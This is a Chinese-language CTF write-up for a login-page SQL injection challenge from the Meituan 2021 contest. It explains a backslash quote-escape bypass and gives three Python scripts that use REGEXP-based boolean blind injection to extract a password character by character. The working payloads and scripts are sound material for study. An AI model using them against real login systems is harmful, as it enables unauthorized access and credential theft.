|
首先按照常规思路进行fuzz,发现被ban了很多东西,不过仍然保留了许多可用函数。看到 =、like 被ban自然而然能想到用 regexp 实现查询;看到单引号被ban自然而然能想到用 \ 转义单引号实现注入。首先尝试payload:username=admin\&password=||1=1%23,回显 flag is not here! ,显然是此地无银三百两。
综上,这道题的sql语句应该是:select * from users where username='$_POST["username"]' and password='$_POST["password"]';。当我们传入 payload 后,sql语句就变成了:select * from users where username='admin\' and password='||1#';。由于第二个单引号被转义了,第1个单引号只能去和第3个单引号进行闭合,后台接收到的 username 就变成了admin\' and password=这个整体,而这个用户名显然不存在,所以理应显示 ‘账号或密码错误’。但是别忘了这样以来,password 参数就成为了可控变量,1=1 显然为真,所以这里回显的不是 ‘账号或密码错误’,而是 flag is not here!
根据上述思路,我们可以编写脚本逐个字符爆破出 password,其实也就相当于布尔盲注。
下面贴几个查询到的文章和EXP:
美团CTF2021部分writeup
import requests
import time
import string
import re
def ord2hex(letter):
result = ''
for i in letter:
result += hex(ord(i))
result = result.replace('0x','')
return '0x'+result
def hex2ord(letter):
result = ''
for i in range(0,len(letter),2):
result += chr(int(letter[i:i+2], 16))
return result
url = "http://eci-2ze7rwkw5ezzl02e1ami.cloudeci1.ichunqiu.com/index.php"
str_list = string.hexdigits
flag = "^"
session = requests.session()
for n in range(1, 100):
length = len(flag)
for i in str_list:
data = {
'username':'admin\\',
"password": "||hex(password)/**/REGEXP/**/" + ord2hex(flag + re.escape(i)) + "#"
}
res = session.post(url=url, data=data)
res.encoding = "utf-8"
time.sleep(0.1)
if 'flag is not here!' in res.text:
flag += i
print(flag)
break
if len(flag) == length:
print(hex2ord(flag.lstrip("^")))
break
第三届美团网络安全高校挑战赛(初赛)Writeup by X1cT34m
import os
import requests as req
def ord2hex(string):
result = ''
for i in string:
result += hex(ord(i))
result = result.replace('0x','')
return '0x'+result
url = "http://eci-2zecwo25ej0i246rbyi7.cloudeci1.ichunqiu.com/index.php"
string = [ord(i) for i in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_']
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection':'keep-alive'
}
res = ''
for i in range(50):
for j in string:
passwd = ord2hex('^'+res+chr(j))
passwd = 'or/**/password/**/regexp/**/binary/**/{}#'.format(passwd)
data = {
'username':"admin\\",
'password':passwd
}
r = req.post(url, data=data, headers=headers)
if "flag is not here!" in r.text:
res += chr(j)
print(res)
break
第三届美团网络安全高校挑战赛(初赛)部分writeUp
import requests
import time
def str2int(mystr):
i = 0
myint = 0
while (i < len(mystr)):
myint += ord(mystr[i]) * pow(pow(2, 8), len(mystr) - i - 1)
i += 1
return myint
sess = requests.Session()
url = 'http://eci-2zea89kqieujgo38pawk.cloudeci1.ichunqiu.com/index.php'
f = '账号或密码错误'
y = 'flag is not here'
start = 0
strlen = 80
sleep_time = 0
ostr = '^'
str2find = 'username'
for j in range(start, start+strlen):
for i in range(32, 127):
if i == 46 or i == 42 or i == 43 or i == 63 or i==94:
continue
time.sleep(sleep_time)
temp_str = ostr+chr(i)
ent = '{} regexp binary {}'.format(
str2find, hex(str2int(temp_str)))
payload = "||{}#".format(ent)
data = {
'username': '\\',
'password': payload.replace(' ', '/**/')
}
sess.get(url)
res = sess.post(url, data=data)
res.encoding = res.apparent_encoding
text = res.text
if f in text:
continue
elif y in text:
ostr += chr(i)
print(ostr, j)
break
else:
print('error:', text)
break
print(ostr)
|